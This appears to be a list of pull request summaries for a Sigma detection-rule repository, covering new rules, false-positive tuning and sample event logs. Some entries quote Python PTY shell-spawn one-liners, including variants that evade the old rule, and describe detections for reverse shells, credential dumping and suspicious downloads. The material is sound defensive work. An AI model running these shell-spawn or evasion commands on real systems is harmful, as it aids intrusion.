new: Kubernetes Unauthorized or Unauthenticated Access
N/A
N/A
=> Add Kubernetes rules in audit log format

rules-emerging-threats/2018/TA/APT32-Oceanlotus/registry_event_apt_oceanlotus_registry.yml, rules-emerging-threats/2018/TA/OilRig/registry_event_apt_oilrig_mar18.yml, rules-emerging-threats/2019/Malware/Ursnif/registry_add_malware_ursnif.yml, rules-emerging-threats/2020/TA/Leviathan/registry_event_apt_leviathan.yml
Move registry APT rules to emerging-threats
chore: OceanLotus Registry Activity - move to emerging-threats
chore: OilRig APT Registry Persistence - move to emerging-threats
chore: Potential Ursnif Malware Activity - Registry  - move to emerging-threats
chore: Leviathan Registry Key Activity -  move to emerging-threats
=> Move to emerging-threats

.github/workflows/goodlog-tests.yml
In my environment I needed to chmod +x this file for it to run properly. I'm not sure what changed or why this was necessary though...
Added chmod +x to run commands
```
run: |
chmod +x .github/workflows/matchgrep.sh
./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
```
chore: Update `goodlog-tests.yml` - Explicitly add the execute permission to the `.github/workflows/matchgrep.sh` via `chmod +x`
N/A
N/A
=> Add chmod for final goodlogs run test on each job

rules/cloud/github/github_disable_high_risk_configuration.yml
Adds a detected actions to the `rules/cloud/github/github_disable_high_risk_configuration.yml` rule (see the doc [here](https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#business_advanced_security) and [here](https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#org)).
It allows the rule to detect the following events:
- `business_advanced_security.disabled`
- `business_advanced_security.disabled_for_new_repos`
- `business_advanced_security.disabled_for_new_user_namespace_repos`
- `business_advanced_security.user_namespace_repos_disabled`
- …
=> Add detected actions to github_disable_high_risk_configuration.yml

rules/web/proxy_generic/proxy_ua_apt.yml, rules/web/proxy_generic/proxy_ua_frameworks.yml, rules/web/proxy_generic/proxy_ua_malware.yml, rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml, rules/windows/image_load/image_load_side_load_dbgmodel.yml, rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml, rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
This PR fixes a small issue with the selection name
fix: Potential DLL Sideloading Of DbgModel.DLL - Update selection name to match the condition
fix: NTLM Logon - Remove unnecessary field
fix: Potential Commandline Obfuscation Using Unicode Characters - Remove legitimate currency characters as they could be used in document names
fix: Suspicious SYSTEM User Process Creation - Update `ping` filter to account for other FP variants found in the wild.
N/A
N/A
=> Fix FPs from testing

rules/windows/create_remote_thread/create_remote_thread_win_susp_target_shell_application.yml, rules/windows/create_remote_thread/create_remote_thread_win_target_shell_app.yml
New rule to detect process injection into cmd and powershell based on:
- https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/
- https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/
new : Remote Thread Created In Shell Application
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/icedid/simulated_icedid/windows-sysmon.log
N/A
=> New Rule : Create Remote Thread In Shell Application

deprecated/windows/file_event_win_susp_clr_logs.yml, rules-emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml, rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml, rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml, rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml, rules/windows/builtin/security/win_security_account_discovery.yml, rules/windows/builtin/security/win_security_atsvc_task.yml, rules/windows/builtin/security/win_security_impacket_psexec.yml, rules/windows/builtin/security/win_security_impacket_secretdump.yml, rules/windows/builtin/security/win_security_susp_psexec.yml, rules/windows/builtin/security/win_security_svcctl_remote_service.yml, rules/windows/file/file_event/file_event_win_net_cli_artefact.yml, rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml, rules/windows/process_access/proc_access_win_lsass_memdump.yml
Hello, thank you for maintaining the rules. :)
The blog at `blog.manasec[.]net` is currently inaccessible due to domain parking, so I will change the URL to `web.archive.org`.
chore: Suspicious CLR Logs Creation
chore: Remote Task Creation via ATSVC Named Pipe - Zeek
chore: Possible Impacket SecretDump Remote Activity - Zeek
chore: Suspicious PsExec Execution - Zeek
chore: AD Privileged Users or Groups Reconnaissance
chore: Remote Task Creation via ATSVC Named Pipe
chore: Impacket PsExec Execution
chore: Possible Impacket SecretDump Remote Activity
chore: Suspicious PsExec Execution
chore: Remote Service Activity via SVCCTL Named Pipe
chore: Suspicious DotNET CLR Usage Log Artifact
chore: DotNet CLR DLL Loaded By Scripting Applications
chore: Potential Credential Dumping Activity Via …
=> Update unreachable references `blog.menasec[.]net`

rules/windows/builtin/security/win_security_atsvc_task.yml, rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml, rules/windows/builtin/security/win_security_svcctl_remote_service.yml
fix: Remote Task Creation via ATSVC Named Pipe - updated field from "Accesses" to "AccessList"
fix: Persistence and Execution at Scale via GPO Scheduled Task - updated field from "Accesses" to "AccessList"
fix: Remote Service Activity via SVCCTL Named Pipe - updated field from "Accesses" to "AccessList"
=> Update of the fields for EventId 5145

rules/windows/image_load/image_load_side_load_dbgmodel.yml
Legitimate usage of dbgmodel by Dell Support Assistant. While some may call Support Assistant malware (lol) this is expected behavior.
Adding additional optional filters for the rule
fix: Potential DLL Sideloading Of DbgModel.DLL - Exclude Dell Support Assistant
N/A
=> Additional tuning for image_load_side_load_dbgmodel.yml

rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml, rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml
Adding in a FP filter for the expected parent process of this command. Since these normally only operate in InTune environments we should assume the parent process of `Microsoft.Management.Services.IntuneWindowsAgent.exe` is trusted (unless something upstream is compromised in which case this could be used to deploy malware quickly accross an environment).
fix: AgentExecutor PowerShell Execution - Exclude `Microsoft.Management.Services.IntuneWindowsAgent.exe`
fix: Suspicious AgentExecutor PowerShell Execution - Exclude `Microsoft.Management.Services.IntuneWindowsAgent.exe`
TP case where Microsoft.Management.Services.IntuneWindowsAgent.exe is not used
N/A
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/bl …
=> Tuning for  agentexecutor.exe commands

deprecated/windows/proc_access_win_lsass_susp_access.yml, rules-threat-hunting/windows/process_access/proc_access_win_lsass_susp_source_process.yml, rules-threat-hunting/windows/process_access/proc_access_win_lsass_uncommon_access_flag.yml, rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml, rules/windows/builtin/security/win_security_possible_dc_shadow.yml, rules/windows/builtin/security/win_security_user_driver_loaded.yml, rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml, rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml, rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml, rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml, rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml, rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml, rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml, rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml, rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml, rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml, rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml, rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml, rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml
Hello, thank you for maintaining the rules :)
I noticed some unreferenced URLs, so I changed them to web.archive.org.
chore: Credential Dumping Tools Accessing LSASS Memory
chore: Potential MFA Bypass Using Legacy Client Authentication
chore: Possible DC Shadow Attack
chore: Potential Privileged System Service Operation - SeLoadDriverPrivilege
chore: Remote Thread Creation In Uncommon Target Image
chore: RDP File Creation From Suspicious Application
chore: Suspicious PROCEXP152.sys File Created In TMP
chore: Outbound Network Connection Initiated By Microsoft Dialer
chore: NTFS Alternate Data Stream
chore: PowerShell Get-Process LSASS in ScriptBlock
chore: Windows Firewall Profile Disabled
chore: Potentially Suspicious GrantedAccess Flags On LSASS
chore: HackTool - PCHunter Execution …
=> Update unreachable references

.github/PULL_REQUEST_TEMPLATE.md, .github/workflows/greetings.yml, CONTRIBUTING.md, rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml, rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml
The final regex in the `Powershell Token Obfuscation - Process Creation` rule was fairly broad and would catch a number of unintended cases. It was also not case insensitive and as such missed some cases. If necessary, I am happy to provide screenshots of my tests demonstrating the unintended functionality of the original implementation and the improvements contained in this PR.
Additionally I fixed two dead links in the PR template and in the contributing readme. 
update: Powershell Token Obfuscation - Process Creation - Optimized used regex
update: Powershell Token Obfuscation - Powershell - Optimized used regex
chore: Fixed SigmaHQ conventions broken links
```
Should not match: ${eeee`:path}
Should not match: ${vn`e:path}
Should not match: ${env:p`}
Should not match: ${e`:p`}
Intended …
```
=> Token obfuscation regex fix

tests/promote_rules_status.py
Use datetime.date like `date` and `modified` in  pySigma
chore: workflow  - update promote_rules_status to use native datetime.date
=> Use native datetime.date

tests/test_rules.py
Remove  test cover by pySigma-validators-sigmahq 0.7.0
chore: workflow -  test_rules.py cover by pySigma-validators-sigmahq 0.7.0
=> Remove test cover by pySigma-validators-sigmahq 0.7.0

rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml
This PR reverts a change made accidentally in #4950
chore: fix `Powershell Token Obfuscation - Powershell` - Revert accidental change introduced in #4950
N/A
N/A
=> Fix `Powershell Token Obfuscation - Powershell` - Revert accidental change introduced in #4950

rules/windows/builtin/dns_client/win_dns_client_put_io.yml, rules/windows/dns_query/dns_query_win_put_io_communications.yml
This PR adds rules related to detection of communications to put.io that was observed in Medusa Ransomware intrusions  
new: DNS Query To Put.io - DNS Client
```xml
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
<System>
<Provider Name='Microsoft-Windows-DNS-Client' Guid='{1c95126e-7eea-49a9-a3fe-a378b03ddb4d}'/>
<EventID>3008</EventID>
<Version>0</Version>
<Task>0</Task>
<TimeCreated SystemTime='2024-08-02T21:41:40.7280319Z'/>
<EventRecordID>991659</EventRecordID>
<Correlation/>
<Execution ProcessID='6160' ThreadID='13288'/>
<Channel>Microsoft-Windows-DNS-Client/Operational</Channel>
<Computer>Redacted</Computer>
<Security UserID='Redacted'/>
</System>
<EventData>
<Data …
```
=> Add Rule: `DNS Query To Put.io - DNS Client`

rules/windows/builtin/ldap/win_ldap_recon.yml
Add additional parameters commonly used for LDAP enumeration.
update: Potential Active Directory Reconnaissance/Enumeration Via LDAP - add enumeration of distinguished names
2024-08-27 09:38:18.7089724 +0200 CEST,11740,12144,Microsoft-Windows-LDAP-Client,30,0,,16,AttributeList: samaccounttype;objectsid;objectguid;objectclass;samaccountname;msds-groupmsamembership;flags,"DistinguishedName: CN=Enterprise Admins,CN=Users,DC=my-domain",ProcessId: 0x2DDC,ScopeOfSearch: 0,SearchFilter: (objectclass=*)
=> feat: add more groups used for LDAP reconnaissance

rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml, rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml
Added a filter to exclude hits where the parent process is `wifivelocityd` which is a benign MacOS system utility that collects wifi metrics. 
fix: System Network Discovery - macOS  -  Add additional filter for `wifivelocityd`
```json
{
"host": {
"chassis_type": "Other",
"hostname": "",
"first_seen": "2022-06-17T22:15:52.000Z",
"system": {
"product_name": "MacBookPro18,3",
"manufacturer": "Apple Inc."
},
"os": {
"platform_original": "macos",
"full_original": "Sonoma (14)",
"type": "macos",
"platform": "Mac OS",
"full": "Mac OS 14"
},
"local_time": "2024-08-11T13:46:24.000Z",
"ip": [
""
],
"name": "",
"id": "4a577aaaa28d40c385b324b576492fff",
"external_ip": [
""
]
},
"crowdstrike": {
"MachOSubType": "1",
"SVGID": "0",
"EnvironmentVariablesString": "MallocSpaceEfficient=1 …
```
=> MacOS rule filter for wifivelocityd false positives

rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml, rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml, rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml, rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml
Hi,
While doing some Incident Response cases I noticed many FPs coming from normal Windows events hence why I am proposing these additions to current Sigma rules.
fix: A Rule Has Been Deleted From The Windows Firewall Exception List - Exclude WinSxS
fix: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation - Exclude "amsiprovider_x64"
fix: Uncommon AppX Package Locations - Exclude additional MS cdn domain
fix: Uncommon New Firewall Rule Added In Windows Firewall Exception List - Enhance filters and exclude empty path
**win_appxdeployment_server_uncommon_package_locations.yml**
I do not have the entire log as it was overwritten by newer entries but full data Path is this:
`https://statics.teams.cdn.live.net/production-windows-x64/24151.2105.2943.2101/MicrosoftTeams-x64. …
=> Sigma rules FP fixes

rules/windows/network_connection/net_connection_win_anydesk_incoming_connection.yml, rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml
Add a new detection rule about detection of incoming  connections via the remote connection tool AnyDesk. This could be a sign of persistence and C2 activities.
This PR is related to the closed one #4897 . Now I fixed the detection.
new: Remote Access Tool - AnyDesk Incoming Connection
N/A
N/A
=> Add rule net_connection_win_anydesk_incoming_connection

deprecated/linux/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml, deprecated/windows/registry_set_persistence_com_hijacking_susp_locations.yml, deprecated/windows/registry_set_persistence_search_order.yml, rules-threat-hunting/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml, rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml, rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml
This PR fixes some of the issues reported
- #4972 - The rules logic is very prone to FP with 3rd party apps registering com. A re-write of the rule is necessary where the focus should be on built-in COMs - A first attempt was [here](https://github.com/SigmaHQ/sigma/blob/bd284a997b1f32b546637671090be3ce73cba051/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml)
- #4966 - Move the original rule mentioned by the issue to hunting as it was reported that it's generating a lot of FPs. Create a similar rule with specific image names to reduce that FP level.
new: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image - A detection replacement for `e0552b19-5a83-4222-b141-b36184bb8d79`
remove: OMIGOD SCX RunAsProvider …
=> Fix Issues

rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml
- Added selection_5136 with new detection logic to support both detections
- Modified `ShareName` to |endswith; as the previous string wouldn't convert properly with default pipeline configuration and `sysvol` should never appear in any other way unless there are weird configurations
- Added reference: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html
update: Persistence and Execution at Scale via GPO Scheduled Task - Increase coverage by adding selection for EID 5136
N/A
N/A
=> Add logic to win_security_gpo_scheduledtasks.yml

rules/windows/builtin/security/win_security_gpo_startup_script.yml, rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml
New Rule for Startup or Logon Script Added to Group Policy Object as per https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html
new: Startup/Logon Script Added to Group Policy Object
N/A
N/A
=> New Rule: win_security_gpo_startup_script.yml

deprecated/windows/proc_access_win_susp_invoke_patchingapi.yml, rules-emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml, rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml, rules-emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml, rules-emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml, rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml, rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml, rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml, rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml, rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml, rules/windows/file/file_event/file_event_win_sam_dump.yml, rules/windows/image_load/image_load_spoolsv_dll_load.yml, rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml, rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml
Hello :)
The URL of the GitHub repository for some rule references was 404, so I fixed it.
chore: Potential NT API Stub Patching
chore: Scanner PoC for CVE-2019-0708 RDP RCE Vuln
chore: Suspicious Rejected SMB Guest Logon From IP
chore: Potential RDP Exploit CVE-2019-0708
chore: Potential PrintNightmare Exploitation Attempt
chore: Malicious PowerShell Scripts - FileCreation
chore: Potential SAM Database Dump
chore: Windows Spooler Service Suspicious Binary Load
chore: Malicious PowerShell Scripts - PoshModule
chore: HackTool - DInjector PowerShell Cradle Execution
chore: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
chore: Possible CVE-2021-1675 Print Spooler Exploitation
chore: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
chore: LPE InstallerFileTakeOver PoC …
=> Fix resolve unreachable(404) GitHub URL reference

rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml
Find FP 
from ref:
Process-Tree:
rundll32.exe c:\windows\[folder]\[beacon].dll [export]
-> cmd.exe /C
-> [additional command]
fix: UNC2452 Process Creation Patterns - Add the missing `all` modifier
```
Image: C:\Windows\System32\cmd.exe 
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\WINDOWS\system32\winrm.cmd" set winrm/config/client @{TrustedHosts="*"}"
CurrentDirectory: C:\WINDOWS\Installer\MSIF27A.tmp-\ 
ParentImage: C:\Windows\System32\rundll32.exe
ParentCommandLine: rundll32.exe "C:\WINDOWS\Installer\MSIF27A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_2814687 57 Microsoft.ManagementExperience.Setup.CustomActions!Microsoft.ManagementExperience.Setup.CustomActions.CustomAction.SetTrustedHosts
``
- If your PR adds new rules, please consider following …
```
=> FP miss the all modifier

rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml, rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml, rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml
Fixing some typos across the repo
chore: fix some typos in the title and description of some rules
=> some typos

rules/windows/process_creation/proc_creation_win_meshagent_exec.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml
This pull request adds a new detection rule for identifying the use of MeshAgent to execute commands on a target host. The rule focuses on detecting scenarios where threat actors might abuse MeshAgent to execute commands directly. Specifically, it looks for the use of win-console to obscure activities and win-dispatcher to run malicious code through IPC with child processes.
new: Remote Access Tool - MeshAgent Command Execution via MeshCentral
N/A
N/A
=> Add detection rule for MeshAgent command execution

rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml
Small update to COM hijacking rule
update : COM Object Hijacking Via Modification Of Default System CLSID Default Value - Add new suspicious locations and builtin CLSID
N/A
N/A
=> COM Object Hijacking Update

rules/windows/image_load/image_load_side_load_python.yml, rules/windows/image_load/image_load_susp_python_dll_load.yml
Add `Potential Python DLL SideLoading`
new: Potential Python DLL SideLoading
N/A
N/A
=> Python DLL sideloading

rules/linux/process_creation/proc_creation_lnx_local_account.yml
Update image options
update: Local System Accounts Discovery - Linux - Increase coverage by adding additional utilities such as "nano", "tail, "vim"
N/A
N/A
=> update rule with new images

rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml
Update of the rule pipe_created_powershell_alternate_host_pipe. 
The Azure Connected Machine Agent process has been added to the filters.
The Azure Connected Machine Agent is used by Windows machines to download and sync Windows policy in Azure environments.
As described in differents resources, the agent (gc_worker.exe) normally spawn Powershell related processes / hosts to run commands.
In the logs we are analyzing we have noise and several FP related this process.
update: Alternate PowerShell Hosts Pipe - Add optional filter for `AzureConnectedMachineAgent` and update old filters to be more accurate
N/A
N/A
=> Add the Azure connected machine agent

rules/category/antivirus/av_password_dumper.yml
Cover MS Defender alert `Behavior:Win32/SuspDCSyncTraffic`. 
Cover MS Defender alert `Behavior:Win32/SuspDCSyncTraffic` with string `DCSync`. It's kind of something different than all the other strings with malware names or categories, but it shows up in the same logs and is as critical, so why not just put it in here.
The screenshot is from pentesting with a Kali VM on a Windows host with MS Defender installed. It blamed vmnat.exe for the traffic coming out of the VM:
update: Antivirus Password Dumper Detection - add DCSync for MS Defender traffic detection
=> add SuspDCSyncTraffic from MS Defender

rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml, rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml, rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml, rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml, rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml, rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml, rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml, rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml, rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml, rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml
Update multiple rules
update: BITS Transfer Job Download From File Sharing Domains - Add `pixeldrain.com`
update: COM Object Hijacking Via Modification Of Default System CLSID Default Value - Add `{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}`
update: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - Add `pixeldrain.com`
update: New Connection Initiated To Potential Dead Drop Resolver Domain - Add `pixeldrain.com`
update: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE* - Add `pixeldrain.com`
update: Suspicious File Download From File Sharing Domain Via Curl.EXE - Add `pixeldrain.com`
update: Suspicious File Download From File Sharing Domain Via Wget.EXE - Add `pixeldrain.com`
update: Suspicious File Download From …
=> feat: update multiple rules

rules-threat-hunting/windows/registry/registry_set/registry_set_runmru_command_execution.yml, rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml
Add some missing ref links
chore: add missing reference links to some rules
N/A
N/A
=> add missing links

rules/category/antivirus/av_exploiting.yml, rules/category/antivirus/av_hacktool.yml, rules/category/antivirus/av_password_dumper.yml, rules/category/antivirus/av_ransomware.yml, rules/category/antivirus/av_relevant_files.yml, rules/category/antivirus/av_webshell.yml
Update 3 rules in category/antivirus
update: Antivirus Hacktool Detection - Add additional hacktools signature names.
update: Antivirus Password Dumper Detection - Add additional password dumpers such as "DumpPert", "Lazagne", "pypykatz", etc.
update: Antivirus Ransomware Detection - Add additional ransomware signature names.
fix: Antivirus Relevant File Paths Alerts - Remove the path "\Client\" as it is too generic for a detection rule.
fix: Antivirus Web Shell Detection - Removed overlapping strings "ASP/Agent", "PHP/Agent", "JSP/Agent".
=> Update 3 rules in category/antivirus

rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml, rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml
The detection rule which aims to detect the spawning of a Python Pretty TTY (example: python3 -c 'import pty;pty.spawn("/bin/bash")') can be avoided by attackers by assigning the spawn function to a variable before calling it. The modified rule is more strict so it detects this.
2 examples, the previous iteration of this detection rule did not catch, which should be detected now, are as follows:
- python3 -c 'from pty import os, spawn; test=spawn; test("/bin/bash")'
- python3 -c 'import pty; test=pty.spawn; test("/bin/bash")'
update: Python Spawning Pretty TTY Via PTY Module - Update the logic to account for the possibility of calling the spawn function via a variable, as an alias or other methods.
update: Python Reverse Shell Execution Via PTY And Socket Modules - Add additional strings …
=> Adjust 'Python Spawning Pretty TTY' to detect ways to circumvent detection

rules/cloud/azure/audit_logs/azure_app_role_added.yml
Updating the `azure_app_role_added` rule that generates false positives when adding roles to users. With the Microsoft documentation in the rule description, it is indicated to make a condition on `Type: service principal`. So I suggest to add this filter in the detection.
update: App Assigned To Azure RBAC/Microsoft Entra Role - Add a constraint to limit the detection to service principal only
=> Update App Role Added based on Microsoft description

rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
Add ie4uinit.exe and msxsl.exe to binary rename rule
Reference - https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/
Update: Potential Defense Evasion Via Rename Of Highly Relevant Binaries - Add ie4uinit.exe and msxsl.exe to old binary rename rule
=> Add renamed binaries from DFIR report

rules/windows/builtin/security/win_security_service_install_remote_access_software.yml
Add AnyDesk to remote access tools service install rule
update: add AnyDesk to remote access tools service install rule
https://usersince99.medium.com/windows-privilege-escalation-8214ceaf4db8
=> Add AnyDesk to remote access tools service install rule

rules/linux/process_creation/proc_creation_lnx_local_account.yml
Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Add a new technique with new binaries and file path.
=> Proc creation lnx local account

rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_running_process_discovery.yml, rules/linux/process_creation/proc_creation_lnx_process_discovery.yml
```xml
<Events>
<Event>
<System>
<Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
<EventID>1</EventID>
<Version>5</Version>
<Task>1</Task>
<TimeCreated SystemTime="2024-12-10T08:24:38.911075000Z"/>
<EventRecordID>383812</EventRecordID>
<Correlation/>
<Execution ProcessID="1252" ThreadID="1252"/>
<Channel>Linux-Sysmon/Operational</Channel>
<Computer>caldera-virtual-machine</Computer>
<Security UserId="0"/>
</System>
<EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2024-12-08 18:58:36.665</Data>
<Data Name="ProcessGuid">{36fe7a82-ec5c-6755-c12c-d51439560000}</Data>
<Data Name="ProcessId">9116</Data>
<Data Name="Image">/usr/bin/pgrep</Data>
<Data Name="FileVersion">-</Data> …
```
=> Proc creation lnx process discovery

rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_process_termination_via_kill.yml, rules/linux/process_creation/proc_creation_lnx_kill_process.yml
```xml
<Event>
<System>
<Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
<EventID>1</EventID>
<Version>5</Version>
<Task>1</Task>
<TimeCreated SystemTime="2024-12-10T10:58:59.793506000Z"/>
<EventRecordID>386594</EventRecordID>
<Correlation/>
<Execution ProcessID="1252" ThreadID="1252"/>
<Channel>Linux-Sysmon/Operational</Channel>
<Computer>caldera-virtual-machine</Computer>
<Security UserId="0"/>
</System>
<EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2024-12-08 21:32:57.540</Data>
<Data Name="ProcessGuid">{36fe7a82-1089-6756-b5ef-941b63550000}</Data>
<Data Name="ProcessId">11554</Data>
<Data Name="Image">/usr/bin/xkill</Data>
<Data Name="FileVersion">-</Data>
<Data …
```
=> xkill image added

rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml
Add getscreen domain to DNS rule
update: add getscreen to remote access software domains
https://lolrmm.io/tools/getscreen
=> add: domain for GetScreen

README.md
Project website: https://attackrulemap.com/
Project repo: https://github.com/krdmnbrk/AttackRuleMap
=> AttackRuleMap project added

rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml
Fix a false positive location with the rule "Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation"
fix: fake wermgr.exe locations, remove legitimate folder 
```
EventID: 11 
Provider_Name: Microsoft-Windows-Sysmon 
Provider_Guid: {5770385F-C22A-43E0-BF4C-06F5698FFBD9} 
Version: 2 
Level: 4 
Task: 11 
Opcode: 0 
Keywords: 0 
TimeCreated_SystemTime: 2024-11-04T09:20:46.7998574Z 
EventRecordID: 17016268 
Correlation_ActivityID:  
Execution_ProcessID: 2116 
Execution_ThreadID: 3088 
Channel: Microsoft-Windows-Sysmon/Operational 
Computer: XXXXXXXX
Security_UserID: S-1-5-18 
RuleName: - 
UtcTime: 2024-11-04 09:20:46.793 
ProcessGuid: {9AD9F73F-8C47-6728-0F00-000000004D00} 
ProcessId: 896 
Image: C:\Windows\system32\svchost.exe 
TargetFilename: …
```
=> fix: FP location wermgr.exe location

rules-emerging-threats/2024/TA/Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity.yml, rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml, rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml, rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml
Fixes the rule to conform to the new way of handling hash fields.
fix: HackTool - Dumpert Process Dumper Execution - prepend MD5 to hash value
fix: Forest Blizzard APT - Process Creation Activity - prepend SHA256 to hash value
fix: ManageEngine Endpoint Central Dctask64.EXE Potential Abuse - prepend IMPHASH to hash value
fix: Renamed ZOHO Dctask64 Execution - prepend IMPASH to hash value
=> Prepend algo to hash values

rules/linux/builtin/lnx_privileged_user_creation.yml
Miss a comma in the detection to avoid FP
fix: Privileged User Has Been Created - Fix comma fp
`Jan 20 10:40:10 redacted useradd[1337]: new user: name=john, UID=0, GID=1000, home=/home/john, shell=/bin/bash`
=> fix: 🐛 Add comma to avoid FP

